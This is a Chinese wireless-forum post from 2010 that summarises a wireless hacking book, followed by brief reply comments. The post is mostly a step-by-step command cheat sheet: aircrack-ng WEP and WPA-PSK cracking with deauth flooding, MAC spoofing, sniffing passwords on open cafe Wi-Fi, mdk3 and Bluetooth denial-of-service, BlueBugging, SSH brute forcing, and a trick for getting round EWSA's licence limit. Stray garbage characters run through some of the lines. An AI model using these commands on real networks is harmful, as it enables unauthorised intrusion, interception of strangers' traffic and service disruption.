查看: 11250|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3723

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。6 ^: ~( S  ^; o, d1 y8 Q

; x5 J# d5 G$ K0 Z以下所有操作均在BackTrack 4中进行。
2 q% Z- p7 }% `! D
+ \9 P) h8 \  p$ f* S/ r
. \# y& q; J4 v! i) j0 ^无线WEP加密P解:1 v+ f+ A" Q5 M1 i+ _

  E) J, i) V, ~* A/ N# n注入P解:5 k1 V5 A9 f3 T

6 F7 D7 T+ L' n- |; [" Jifconfig
. k' }' {( y: O9 N/ l* U1 u0 o; p. H" f
* W+ l. C8 e- I. ~9 V- Yifconfig –a( O' t' a8 g8 y- \

, W4 N  B6 g+ A* Mifconfig wlan0(无线网卡) up
- F  |5 `; j- I* k! p& I2 B1 C+ J. F# y, l
airmon-ng start wlan0  P; Q/ h( r0 M, z9 t- x& y
% e' k2 w) K0 |1 b
airodump-ng mon0
/ L6 v$ d  }5 L( g4 v3 |
: o6 S, y/ ]9 f: Rairodump-ng --ivs –w ivsfile –c 频道 mon0或* v) l* V$ F( i( O  t

+ K" m) f3 ^" P; Q9 lairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon00 K5 F- m& ~  v) \/ E. L

1 A$ p) G8 h, K# k% vaireplay-ng -3 –b BSSID –h Station mon0, u; F+ ?8 Y4 Q/ ^. R$ L8 h6 a

+ |& U4 @2 ?9 ^( k' v6 e; r$ D  Faircrack-ng ivsfile-01.ivs  ?( j3 M- q, V: [
0 @4 k; Y0 H: p) e  r4 J, \
虚连接P解(适用于无客户端连接APP解)
* ^0 O% O6 {0 @( z0 Y5 @; V  s3 q# ^  J3 }  e, ^
ifconfig$ @7 ]  T4 y. C5 d' k) J! \8 I, f, J" ~

* l4 l" g4 i, M5 ]1 m( f* u* [. Xifconfig –a. H5 x3 p( w/ M+ v/ l
6 L1 o- r4 W* K2 S0 C
ifconfig wlan0(无线网卡) up6 z8 c/ g* D3 f. t  Z

1 K, V; p* G) a: x, O. uairmon-ng start wlan0& `. n/ a& u0 z. X; O/ X. W8 O

+ V4 K7 q0 e" uairodump-ng mon0
. ~8 {, K4 h. i: H  Q4 Q* E. y# e' c- T/ u! h5 V/ @8 Z# p* Z- ~
airodump-ng --ivs –w ivsfile –c 频道 mon0或. l) S: l' S% g
* L  [+ v' w# s6 q* N
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
) r# M# O$ E, _  ~
' ]0 e0 x  C' H7 a8 T  i) q* I' W, saireplay-ng -1 0 –e SSID –a BSSID –c Station mon0
+ z" b- P/ p5 Z& y% Q% O% r9 f, W$ G# I- l$ A$ U& r
aireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0
/ [* i" I. n' k* Y  _! ~
, Q: V2 p0 l: v; p1 b% r  kaircrack-ng ivsfile-01.ivs
8 Y) g3 ]* O6 S  h( m* x3 z
' ?- c. c. B7 Z6 j+ I" p# w. S$ P3 b. R$ x
还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。
& [9 f3 Q3 b2 S% N" O2 n7 r# r- K+ d( t- n

% f% j! |3 H; N4 V1 gWPA-PSKP解
; z; j# H' Y' j
' Z, W  l9 t* Gifconfig
6 o1 }' S7 a+ n" W
6 g: K' y2 \- N( H( Aifconfig –a
4 X- {% o2 y1 ~/ [% n
6 f, `( @0 E5 g  P- Z( ~/ D  Z& fifconfig wlan0(无线网卡) up
. W3 _5 |5 Z4 V5 @# [! h' X  F( a8 e4 l
airmon-ng start wlan0
: k: w6 R0 ^3 B  v
0 ~' p9 u6 _3 C+ q1 W0 x1 Xairodump-ng mon09 e6 v/ ?; m3 d- ^

  [  w! p  t0 \( f, Hairodump-ng –w capfile –c 频道 mon0
! z& Z; m8 i* _; |; G: a2 Y$ \2 e! w+ V& A) v) }
aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包! F7 G  |7 O5 {) B
6 f# j- l' l0 S  W
aircrack-ng –w Dic capfile-01.cap或
# S+ y9 H2 }9 }: g/ C
( @% t- y6 ]! s9 J' v" ]( s8 ocowpatty –f Dic –r capfile-01.cap –s SSID
- k1 B& Z$ X. u& J& L; f, m
* c7 S3 M. L% s# d: _; rcowpatty –d HashTable.Hash –r capfile-01.cap –s SSID
  t' o' f* l% Q* _8 @
9 a* b' |$ Y  i9 j傻瓜式P解软件SpoonWPA。% X  j$ S: r, G$ Q  ?

' C- \+ ^8 c, @7 P( dBT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst$ I- p* z9 N: E& `: x* p8 D# ?) ?$ X
. u* d* a; }# d0 X. Y

' l7 ^8 P2 `/ X% I( ~9 j) e0 R字典文件的生成和上传8 p7 c9 E& J6 _- T, z5 q+ z# W
; w7 t1 ~, `  q) X8 u$ w
在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。* m  V3 x, e3 t: l/ {6 S1 i0 T/ I
4 o6 o; u* ^  u! n. T0 W
1 w8 M" P- a& N& `" T+ I& b, E, O
BT4下开启Tftp:Services—TFTPD—start TFTPD1 E* S6 x6 b4 Y1 {* ^

% q3 k0 J: B6 s# u8 @2 n在Windows的CMD中运行 tftp –i IP put **.dic
2 L' b2 ?4 h$ ]$ w; K" Y. N: B
, E' m2 H0 ?, Y2 r
! S$ J8 c4 G' F1 yBT4下开启SSH:Services—SSH—start SSH
- i. m3 s3 m) N9 J" f- M. [
" H' }5 @8 o$ s- d, ]Windows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root
! B3 x$ d% ~. q' f4 E7 r8 A& a7 m$ E- ^

' x2 T/ J; H9 b  qAP限制MAC时的解决
0 R, k, x5 O% R4 a8 }
1 f4 K* V8 j, K当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:! i6 I6 X7 b, r+ Y& U
$ l/ @( E4 V+ ~2 b9 |
ifconfig wlan0 hw ether NewMAC6 ^# P& I# s5 m; f: w

5 ]% E4 k7 P2 \  g" h1 f: E6 z% {# o; h& I
1 z/ m4 T2 H7 }" G) s关闭SSID广播的AP探测:
3 X& L2 a1 r' f# @. i, q' y4 v2 q8 o; o' G  s$ {4 Z
1.     Deauth攻击:
$ ~$ ]/ K. O# r6 Q$ w
8 S0 P, X- I# f0 }! O6 tairodump-ng mon0' Z4 P2 Q7 K4 L" v3 a% C7 a

4 G, |/ J- M: V# Zaireplay-ng -0 10 –a BSSID –h Station mon0
) z; w* c# w4 C3 L2 Q7 Y$ M" F& I' U0 O2 z5 J
2.     抓包分析
3 o: ?4 r+ ]& F9 G) @0 x
: [, [9 I) Z2 t! o0 o. @) E* a( \Omnipeek
& u# g  j) S) N9 `/ G- @0 `/ y$ q! e  c; h+ B& P! u) e" F) a8 x
Tcpdump –n –e –vvv –i 网卡名' d( b8 i& Y8 H  y7 w: p% O
0 b$ Q5 ]4 n( ~" s/ c  B
3.     暴力P解
( t+ V" l7 a7 |' i; y' @6 E
2 M2 m( `% Z; c0 l$ Q6 vCharon 1.1暴力P解
; {$ o4 G/ j+ o& [3 d: `8 M  c/ x- W8 s% B* `) o( R
) l+ ^( X0 ^8 T5 r9 g0 u
无线加密数据包的解密$ Z8 F0 h! ?1 W+ F3 L1 L1 W% `

4 {( D+ N  ~6 h9 |+ ^$ f
( v3 S) X8 o, [) t: o3 a# b; {使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。8 f' o, o! c; J+ ?4 u5 [" P+ Z

, M5 i. v4 r/ nFilterNS     DNS解析数据包
+ q% k1 H4 O1 p4 b' o/ R6 P6 |! ~) D# r- |6 A
Filter:HTTP    WEB访问数据包0 n8 B# j8 i" P7 ~7 A! T

( m2 T2 [/ A& g5 |  AFilter:msnms   MSN
' v" Z( t2 Q/ }$ `0 ?, L7 N# Y* O; O2 H7 j
Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。  P0 T0 D9 F; w! T+ v
* N2 A8 B3 F) R6 f# L$ O
使用airdecap-ng解密:5 ]5 v8 Q- l4 s) y+ E: b

3 X" c" I0 |0 ?& O' ^Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap7 u+ P* d2 g' c. s9 ~; J

7 ^* U+ G& N# Y8 e) c
: u* H! n6 \; s! {: o) k. @咖啡馆中无线数据截取(开放式无加密AP)
0 W9 _5 \. j8 Q) |
3 w1 t- F- @4 L2 ^3 j) F1.Airodump-ng –w data –c频道 mon0
. ]. ?% U  X2 S' F! z3 T. @4 ?. {7 Z: P, v2 t9 l( _6 M3 D7 j$ e
2.使用WireShark打开分析9 {4 h7 p9 ]% G

+ X; n' Z0 X3 j1 J
- _) v% c% J3 ]( N9 F. GBT4下的渗透工具:
; [- N4 e, j& h( k- H+ n0 _: H
+ N' h: t1 g1 \; V8 }, h1 Unmap –sP IP/24        判断C段下存活的主机
2 T% }( ]0 j3 e. [4 W) k
3 c- f- S- q7 r- wnmap –vv –sS IP/24 –p Port    扫描指定端口是否开放
7 L7 k9 ]* I7 }( {
' a; r, m2 a2 ?; T/ D: @- ?: snmap –vv –sV IP –p port   指定端口的详细信息。。。5 s$ e8 @- [% n& d
% H5 r3 h( C8 o7 l$ ^. d
namp –O IP/24    判断主机的系统版本2 Y& r, o% S' N

- V" G( q7 v% A+ y' f/ u+ U* T( c, g! j4 G  C+ ]& n2 @7 v
GUI 版nmap:Zenmap 7 ^& _" _' \3 s0 Q% Y* Z  q' ~2 j

" f- F- i- n. {9 F( H/ s/ K0 f! O1 y2 x* D  G* R7 Y8 j% U
Amap使用:amap –B IP port8 N7 h2 e) F, `% C

2 i- D3 F& a  v. INbtscan(扫描Windows网络NetBios信息):
& s- @7 L; a' g1 G$ i* E+ h9 D6 ?' p* g9 m7 [' |4 X; }
nbtscan –v –s : IP/24; q6 }5 {+ m& P% |
0 H/ W& c3 p) S  |
nbtscan –r IP2 T3 H. d. a1 L. o! t+ Y
& T! O' O; t, H0 ?. R! G  g
: Q$ x# g: |3 x. N1 a
DNSWalk(指定域名的DNS探测):./dnswalk XXX.com.' n8 P7 D2 a( t. J: c4 n) Y

: |4 R/ v# I: B! p9 d+ }. Z" a  W  q2 @1 ~- x: v% H
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)! L8 ?6 b) E' T' p2 L9 a/ ^% `! |
* C0 A4 J1 r& [! @% a6 r7 l$ ]. E
BruteSSH: ./bruthe.py –h IP –u Username –d Dic3 a+ ^7 Q! o2 D5 l: N

# e$ N. a' \' M# B4 o" lMetasploit3使用0 z6 B+ h9 [* S: l
无线D.0.S
9 z$ R; f3 |+ w" B5 d5 b/ i  P$ U3 E. P, g) ~

5 B4 s9 l  `1 d' uAuth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)
4 u% x5 u$ ?& x+ G8 l# @: W
4 e2 f; l# P0 w8 ^airmon-ng start wlan0: D3 M+ K/ T- Y& x
; ]- y) T8 K2 P+ u  A  o3 e) }
airodump-ng mon0* w1 z/ Q4 J5 ~
: b: g- M* I0 S7 `2 D5 ]
mdk3 mon0 a –a BSSID
* J- U* D6 K& s  N8 v( i
$ h: L, ~. ~) x/ N5 B' O# J对所有的AP攻击:mdk3 mon0 a
; _5 _- {/ c. n' e% h. v
" C. f, e+ J. t# Q9 L/ i; m6 H" d6 n" [/ C) r) l" R* x
Deauth Flood 攻击8 Q9 t! J' v8 o4 p; z: E" J
" X+ v8 @+ o0 j8 }# P9 Z
mdk3 mon0 d –c Channel0 x* L7 N; A5 r* I) I

& \+ T9 x6 }- C图形化D.O.S攻击:Charon! R9 {# H* t: ^3 w3 S

" \% |' p; x* h) l2 T, A) c- ^1 c$ X' h- H
9 D3 ^0 j; l3 H: c' B$ M当受到攻击时,使用Wireshark抓包可以看到异常信息。! Y2 h/ h4 @! |( q

, d5 g3 L4 v0 S2 h  o
3 K2 \3 y- m( a) l* \2 D1 xWPA-PSK高速P解
0 S6 O% h% d+ c1 v; Z( W. k, k  P* t. \; v, d% H5 _
1.       WPA-PSK PMK Hash TablesP解
7 G- @! o% K2 I* N: _6 B. q+ u- L! c8 V* [' \6 [, H
Cowpatty –d HashTable.hash –r ***.cap –s SSID
9 ?+ d1 s) U! o, u7 J/ b6 J5 @- |; ^" l1 |# N: R6 d
Hash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
4 g3 M/ x4 ?% O7 h; S4 U* v3 t& v8 B; B' |+ ^% B) c
2.       GPU辅助高速P解8 J# F( O& \9 }" n

8 W4 d1 E( Z' u4 t" D( \( w: r使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。& D9 F5 [9 h4 K) S4 u3 h5 P2 j5 G1 \9 a

6 x/ S* L* Q& h- S! O6 J7 A. K3 h' L3.       分布式P解
! g0 n2 K5 a: d. n2 k, U# x
! W" n3 u( y( G- E4 `* }0 ?5 V4 @
5 w  J; G2 L+ x$ }5 G1 W9 S) rAP的伪造- ^  g+ Y2 B8 \4 J2 T' |3 P2 l5 b

  _1 q9 \8 \" D, I3 e# P把AP的MAC改成目标AP的MAC
5 @% F2 Y, U1 g. O+ R$ e
) m5 ~6 U& H' U7 r7 y网卡软AP7 b/ _1 K8 Y- h- @. Q" n" x% J; H

  c1 q5 N  w. A' ~& n/ c5 o1 Q* R! Y2 [, I  p+ K; n  c7 P# q
伪造大量虚假AP信号:5 Z# i* t- B% I8 N) i5 O6 t
6 J- e; b5 l) W6 w* \  y2 u
随机SSID:mdk3 mon0 b –g –c 频道
9 t2 Z9 _& u) i- p( {4 e- d! V# Z* S- f9 x% z
指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度  @$ P  B0 S6 H2 A3 r. H
$ z" T. v( ^) F: }1 r* m, C
5 x( q" L! a1 }0 x, a- s! U6 t3 ?( g5 e
War-Driving4 e, b$ u, }3 v+ r, g3 p- l
. _' _0 @+ O& ~7 r! j
热点地图绘制
6 o; t7 I7 m6 x* \3 L, k" C
# _% Y, T) W! K* c; \& E% G/ G+ EWindows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。6 k4 J, r# {6 Z/ Q+ }! E
. U# e! L5 ^' D+ [' e; }8 @6 \
! z' D3 t& N1 k
Netstumble' u5 d  v# l6 x# J+ f7 N4 U

3 k4 J, C3 @( `  W4 S. b. G5 p+ D1 N9 ~; R! K0 c3 ]
蓝牙Hacking
6 V  i' I' l# l$ G% p+ T; b$ k9 c0 O+ @. n- s4 r
Windows下的Blue Soleil工具
. {; C  t. Y  r4 ~+ F* d+ W+ `$ T: f. p! J' [! W
BT4:- g' y' l! B- S- I, `; k
) i; |- F2 P, l; ]+ p
hciconfig 查看蓝牙适配器9 t1 u8 y& A) k* v2 }$ Z, q
3 M1 [% U2 u9 Y6 q8 n9 f% G9 R
hciconfig hci0 up 载入蓝牙适配器  ?, a) Y* }: a( ^( Y) ]3 j3 B

+ T9 C- {7 |- e: @' S2 s( Nhciconfig hci0 class 蓝牙适配器详细信息* H0 `1 r. v3 k4 L5 d2 m7 D0 n
5 ]& |* [6 m0 O2 ]9 q  K2 {' W! x' b" i

2 @' \. |: J  |* B! e# J; nhcitool(扫描蓝牙)
+ I0 ~6 I6 I" k+ a6 w( P2 G' i8 x: H7 X$ k4 l
hcitool –i hci0 scan- v  T- P* D+ J5 b8 v2 D
/ c9 g8 {6 k* {# b" V, g
BTscanner(扫描蓝牙)
0 ~  p' Q# H: E3 t) A
* `4 ^5 f8 O. m; L: d  f
8 ]+ R9 c- W) P6 R2 {% W- _蓝牙攻击:
3 i  h0 E: q4 e5 f+ P$ n4 D  t# ]/ s* b$ b$ p! S" u
BlueBugging (适用于BlueTooth V1.1的手机)
0 O' O. |! q% r! M7 V. s
) I  r5 Y' N/ n- |( jBluebugger工具:% d" H9 X& ]; e2 ^6 s

. m; T! [/ m* C. `Bulebugger –a HD_Addr info+ m7 D0 k' {5 r0 s/ R* K: d
( ]! F0 e) U$ v( a4 U

4 Z2 ^9 [6 I1 y/ w/ m7 bBlueJacking9 ]  Z; ?5 w0 Z! [9 U- f7 \  a3 U

! T# y- F; h1 f/ E实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。+ z0 N/ _+ G, F4 F. Y

6 G, [. v( S2 B
& ]' `3 n( [" A7 b+ eHD_Addr修改:
& m2 s& `+ E0 j# F; G# c& H0 [4 b8 X4 m) ^6 G# \; a
Bdaddr工具& @# c! b+ M5 Z  O8 f! N2 o

; Y5 J2 m/ Q% @5 Vbdaddr –i 蓝牙设备名 新HD_addr4 b! T$ e) _  t! R: Z
) n0 g* Q* _% u% E% ^6 z
$ _: ~2 x# k* u1 O
蓝牙D.O.S8 o: F4 z9 Z# O/ D

# `' P$ B# K+ T% vl2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
$ [+ U2 m2 J8 |2 W, F7 o
4 r3 J' ]6 n" R9 T: L4 Ehciconfig! ~2 t3 W+ T& x5 {

/ |; J7 c6 T# thciconfig hci0 up
" p2 u& W3 ^1 z2 o9 E
& E& w7 O  p/ W" D7 M3 R* u% Phcitool –i hci0 scan) p' m! s2 ?$ }' k; Q' |

- R/ F) P" g0 kl2ping –s 10000 –目标MAC, f- {& h" r9 z& e# }7 Z8 R7 {

6 O& ~9 u+ B& t% s* [" z. m, B8 I- S! Q- E5 ?" z2 w
不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
* H$ J. l! T  E/ ?& u/ f  ]1 x/ t/ Q6 ?, w9 F$ q
./fang –r ************-############ -s
% v/ }. [2 g2 y' U) D" W2 O2 F
3 @- i$ W$ e/ e/ j8 _$ H! _, b暴力P解************-############的蓝牙设备& l% I1 v" N$ o. d' V

) W9 J, z& Q. _0 E: X2 K, E( @./fang –l 各厂商BD_Addr分配
2 F7 A4 a, o: ^
& D/ V* M2 U4 s+ s# T/ n' c% c- b  k& p8 J6 I
WifiZoo使用
& C; \+ L$ k; q8 y  S5 Y3 m/ o! R& v) M
./wifizoo.py –c Capfile
# \4 e/ T# A( l% B$ r- w, ?4 ]7 b' o; a5 P, [! S$ K+ r( {( Y
访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

835

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

143

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2266

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1138

积分

上尉

签到天数: 5 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

257

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

946

积分

中尉

签到天数: 13 天

[LV.3]偶尔看看II

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

87

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。
# F2 R' l& y# \7 u1 A* t借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的4 X  _. ?) m" W5 F
呵呵 其实也不贵 21块 快递再一点
: q# p% ~2 e$ g, d/ j4 p# P2 r; ^9 t3 t我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 加入

本版积分规则

Archiver| 手机版| 中国无线门户 ( 粤ICP备11076993 )  |网站地图

GMT+8, 2018-2-18 14:23

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表